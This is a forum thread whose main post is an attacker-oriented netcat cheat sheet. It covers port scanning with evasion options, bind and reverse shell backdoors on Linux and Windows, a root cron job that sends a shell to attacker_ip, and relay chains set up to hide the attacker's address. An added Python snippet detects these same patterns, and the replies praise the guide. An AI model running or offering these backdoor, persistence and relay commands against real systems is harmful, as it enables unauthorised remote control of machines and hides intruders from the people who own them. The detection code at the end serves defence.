Netcat reference
  • The-Force
    Posts: 15
    Listening on a TCP/UDP Port

    netcat will listen for incoming connections to the specified port

    nc -lvvp 1337

    The -l puts netcat in listening mode, the -vv tells it to be (more) verbose, and the -p specifies the port to use (to specify UDP, the -u switch is used).

    Transferring Files

    An attacker can transfer a file using netcat by either pushing it or pulling it from a client.

    Set the destination machine receiving the file to listen for and accept the connection. Redirect all input into a txt file:

    nc -l -p 8080 > file.txt

    Send the file from the source machine:

    nc destination_ip 8080 < file.txt

    Send the file from the source machine to the destination (push file):

    nc -l -p 8080 < file

    Receive the file on the destination machine (pull file from source):

    nc source_ip 8080 > file

    Port Scanning

    netcat supports TCP connect scans (the three-way handshake is completed):

    echo QUIT | nc -vv -w3 [target_ip] [starting_port]-[ending_port]

    This command will connect to each port in the range specified and input QUIT. The -w switch is used to limit the wait time for a response from the target (three seconds in this case).

    Example port scan for port 80 for all hosts in the 10.10.10.0/24 subnet:

    for i in {1..254}; do nc -vv -w2 10.10.10.$i 80; done

    The -z option can also be used to port scan. This tells netcat to send a minimum amount of data to obtain an answer from an open port. Combine this with the -v switch in order to see the results:

    nc -z -v 10.10.10.1 1-1024

    Note: the -r switch can be used to randomize the scanning of ports and the -i switch can be used to specify an interval of time to wait before each connection attempt. This can be useful for evasion.

    nc -z -v -r -i 60 10.10.10.1 20-23

    Netcat As A Backdoor

    Netcat can be used to create a passive backdoor that will send the attacker a command shell when a connection is made. If there is a router or firewall filtering access, then netcat must be used to actively push a command shell from the victim to the attacker.

    Passive backdoor:
    on victim machine:

    nc -l -p 8080 -vv -e /bin/sh

    Note: for Windows machines, use:

    nc -L -p 8080 -d -e cmd.exe

    on attacker machine:

    nc remote_ip port

    Note: Once you disconnect, netcat will terminate. To prevent this, wrap netcat in a shell script that will restart upon disconnect:

    #! /usr/local/bin/bash
    while true; do
    netcat -l -p 8080 -vv -e /bin/sh
    done

    Active backdoor:
    on attacker machine:

    nc -l -p 8080

    on victim machine:

    nc attacker_ip 8080 -e /bin/sh -vv

    Netcat can also be set to run as a cron job:

    1 * * * * root nc -e /bin/sh attacker_ip port

    Relaying Traffic

    Traffic relaying can be used to obscure the attacker's location on the network. Several netcat clients and listeners are set up to bounce an attack across several machines controlled by the attacker. There are three methods for creating a netcat relay:
    Modifying inetd on UNIX/Linux
    To create a relay using inetd and netcat, the attacker can add a line to /etc/inetd.conf that will cause inetd to listen on the specified port and launch netcat in client mode to forward traffic.

    port_to_listen_on stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc ip_of_next_hop port_of_next_hop

    Explanation: listen on port specified, receive a stream of data, use tcp, always use nowait for streams, run the redirector process as the user nobody, use the tcpd program, run netcat in client mode, connect to ip of the next hop on the specified port.
    Note: Tripwire and similar integrity checkers will implement a warning when the file is modified.
    Setting up a backpipe on UNIX/Linux
    The mknod command is used to create a file that will be used to transfer data between a netcat server and client. The file created is often referred to as a named pipe, since it contains FIFO properties.

    mknod backpipe p
    nc -l -p 8080 0<backpipe | nc next_hop_ip next_hop_port 1>backpipe

    This command sets up netcat to listen on the specified port, forwarding data to the IP of the next hop on the given port. The backpipe file is used to direct response traffic from the destination to the source.
    Creating a relay bat file (useful for Windows and can be adapted for UNIX/Linux)
    Create a batch file that contains the following text and save it as ncrelay.bat:

    C:\path\to\nc.exe ip_of_next_hop port_of_next_hop

    Start the relay by running the following command:

    C:\> nc -l -p 8080 -e ncrelay.bat

    When a connection is made to netcat on the relay machine, the ncrelay.bat file is executed, attaching its input and output to the netcat listener. The connection to the next hop IP address is made and all traffic can now be transferred.
    Example of port redirection with netcat:

    In this scenario, connection attempts from 10.10.10.40 destined to 10.10.10.50 for port 3333 should be redirected to 127.0.0.1 for port 80.
    On 10.10.10.50:

    nc -lvvp 3333 0<backpipe | tee -a inflow | nc 127.0.0.1 80 | tee -a outflow 1>backpipe

    Then from 10.10.10.40:

    nc 10.10.10.50 3333

    Once the connection is made, the HTTP headers can be retrieved to verify the port is being redirected to the web server running on 10.10.10.40.

    This can also be used to redirect connections from 10.10.10.50 to 10.10.10.60. In this example, we will connect from 10.10.10.40 (the attacker) to 10.10.10.50 (the middle machine) for port 3333, which will then connect to 10.10.10.60 (the victim) on port 5555 and return a shell. 10.10.10.60 will log any connection attempts as originating from the middle machine and not the actual IP of the attacker.

    On 10.10.10.60 (victim):

    nc -lvvp 5555 -e /bin/sh

    On 10.10.10.50 (middle machine):

    nc -lvvp 3333 0<backpipe | tee -a inflow | nc 10.10.10.60 5555 | tee -a outflow 1>backpipe

    On 10.10.10.40 (attacker):

    nc -vv 10.10.10.50 3333
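    As an added example (not part of The-Force's post), the following Python snippet shows the detection side of the patterns above: it classifies process command lines, system crontab entries and inetd.conf entries that invoke netcat the way the post describes (bind shell, reverse shell, cron persistence, inetd relay, -z scan). The sample lines are constructed, the address 203.0.113.7 is a documentation-range placeholder, and the function names are my own.

```python
import re
import shlex

# Constructed sample lines (not captured from a real system): process command
# lines, one system crontab entry and one inetd.conf entry, modelled on the
# commands in the post above. 203.0.113.7 is a documentation-range address.
SAMPLE_LINES = [
    "nc -l -p 8080 -vv -e /bin/sh",
    "nc -L -p 8080 -d -e cmd.exe",
    "nc 203.0.113.7 8080 -e /bin/sh -vv",
    "1 * * * * root nc -e /bin/sh 203.0.113.7 4444",
    "8080 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc 203.0.113.7 443",
    "nc -z -v -r -i 60 10.10.10.1 20-23",
    "nc -l -p 8080 > file.txt",
    "sshd: user [priv]",
]

NC_NAMES = {"nc", "netcat", "ncat", "nc.exe"}
CRON_FIELD = re.compile(r"[\d*,/-]+")   # minute/hour/dom/month/dow fields

def classify(line):
    """Return the netcat misuse patterns found in one line ([] if none)."""
    try:
        toks = shlex.split(line)
    except ValueError:
        toks = line.split()
    # The netcat binary may sit behind a cron or inetd prefix, so search for it.
    idx = next((i for i, t in enumerate(toks) if t.rsplit("/", 1)[-1] in NC_NAMES), None)
    if idx is None:
        return []
    flags = [t for t in toks[idx + 1:] if t.startswith("-")]
    letters = set("".join(f[1:] for f in flags))      # "-lvvp" -> {l, v, p}
    listening = bool(letters & {"l", "L"})
    found = []
    if "e" in letters:   # -e hands the connection to a program: the backdoor pattern
        found.append("bind shell (-e on a listener)" if listening
                     else "reverse shell (-e on an outbound connection)")
    if "L" in letters:   # Windows-only: keep listening after the client disconnects
        found.append("persistent Windows listener (-L)")
    if "z" in letters:   # zero-I/O mode is only useful for scanning
        found.append("port scan (-z zero-I/O mode)")
    if idx == 6 and all(CRON_FIELD.fullmatch(t) for t in toks[:5]):
        found.append("cron persistence")
    if "stream" in toks[:idx] and "nowait" in toks[:idx]:
        found.append("inetd relay")
    return found

def scan(lines):
    """Map each suspicious line to its findings; lines with no findings are dropped."""
    return {ln: hits for ln in lines if (hits := classify(ln))}
```

    Plain listeners used for file transfer (as in the last netcat sample) produce no finding, so the check is about -e, -L, -z and the cron/inetd launch context rather than netcat itself.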
  • Xin
    Posts: 3,251
    Very useful guide to users new to netcat, great job.
    Xin
  • Bursihido
    Posts: 406
    thanks bro :) very nice tut.